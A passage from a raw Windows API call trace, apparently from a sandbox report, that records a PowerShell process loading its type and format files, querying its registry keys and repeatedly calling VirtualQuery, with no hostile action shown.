lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1000, lpOverlapped=0x0) returned 1 [0102.919] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x1b4, lpOverlapped=0x0) returned 1 [0102.920] ReadFile (in: hFile=0x334, lpBuffer=0x2c156e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acfc8, lpOverlapped=0x0 | out: lpBuffer=0x2c156e0*, lpNumberOfBytesRead=0x1acfc8*=0x0, lpOverlapped=0x0) returned 1 [0102.920] CloseHandle (hObject=0x334) returned 1 [0102.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0102.920] SetErrorMode (uMode=0x1) returned 0x1 [0102.920] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acf40 | out: lpFileInformation=0x1acf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0102.920] SetErrorMode (uMode=0x1) returned 0x1 [0102.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0102.921] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad028 | out: phkResult=0x1ad028*=0x334) returned 0x0 [0102.921] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acfac, lpData=0x0, lpcbData=0x1acfa8*=0x0 | out: lpType=0x1acfac*=0x1, lpData=0x0, lpcbData=0x1acfa8*=0x56) returned 0x0 [0102.921] CoTaskMemAlloc (cb=0x5a) returned 0x248140 [0102.921] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acf7c, lpData=0x248140, lpcbData=0x1acf78*=0x56 | out: lpType=0x1acf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acf78*=0x56) returned 0x0 [0102.921] CoTaskMemFree (pv=0x248140) [0102.921] RegCloseKey (hKey=0x334) returned 0x0 [0102.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0102.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0103.044] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.047] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.048] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.048] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.048] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.048] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.049] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.050] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.055] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.055] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.055] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.056] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.056] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.056] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.056] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.056] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.060] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.063] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.064] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.064] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.064] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.065] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.065] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.065] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.065] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.066] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.066] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.066] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.066] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.066] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.069] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.071] VirtualQuery (in: lpAddress=0x1abd20, lpBuffer=0x1acbe0, dwLength=0x30 | out: lpBuffer=0x1acbe0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.071] VirtualQuery (in: lpAddress=0x1abd20, lpBuffer=0x1acbe0, dwLength=0x30 | out: lpBuffer=0x1acbe0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.071] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.073] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.085] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.085] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.086] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.089] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0103.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.090] CoTaskMemFree (pv=0x1b7400b0) [0103.091] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.094] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.094] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.095] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.095] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.095] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.095] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.097] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.098] VirtualQuery (in: lpAddress=0x1abd10, lpBuffer=0x1acbd0, dwLength=0x30 | out: lpBuffer=0x1acbd0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.098] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad1c8 | out: phkResult=0x1ad1c8*=0x304) returned 0x0 [0103.098] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x1ad1dc, lpData=0x0, lpcbData=0x1ad1d8*=0x0 | out: lpType=0x1ad1dc*=0x1, lpData=0x0, lpcbData=0x1ad1d8*=0x74) returned 0x0 [0103.098] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x1ad14c, lpData=0x0, lpcbData=0x1ad148*=0x0 | out: lpType=0x1ad14c*=0x1, lpData=0x0, lpcbData=0x1ad148*=0x74) returned 0x0 [0103.098] CoTaskMemAlloc (cb=0x78) returned 0x275810 [0103.098] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x1ad11c, lpData=0x275810, lpcbData=0x1ad118*=0x74 | out: lpType=0x1ad11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ad118*=0x74) returned 0x0 [0103.098] CoTaskMemFree (pv=0x275810) [0103.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0103.099] SetErrorMode (uMode=0x1) returned 0x1 [0103.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0103.099] SetErrorMode (uMode=0x1) returned 0x1 [0103.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.099] SetErrorMode (uMode=0x1) returned 0x1 [0103.099] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0103.099] SetErrorMode (uMode=0x1) returned 0x1 [0103.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0103.100] SetErrorMode (uMode=0x1) returned 0x1 [0103.100] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0103.100] SetErrorMode (uMode=0x1) returned 0x1 [0103.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.100] SetErrorMode (uMode=0x1) returned 0x1 [0103.100] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0103.100] SetErrorMode (uMode=0x1) returned 0x1 [0103.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0103.101] SetErrorMode (uMode=0x1) returned 0x1 [0103.101] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0103.101] SetErrorMode (uMode=0x1) returned 0x1 [0103.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0103.101] SetErrorMode (uMode=0x1) returned 0x1 [0103.102] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0103.102] SetErrorMode (uMode=0x1) returned 0x1 [0103.102] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0103.102] SetErrorMode (uMode=0x1) returned 0x1 [0103.103] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, 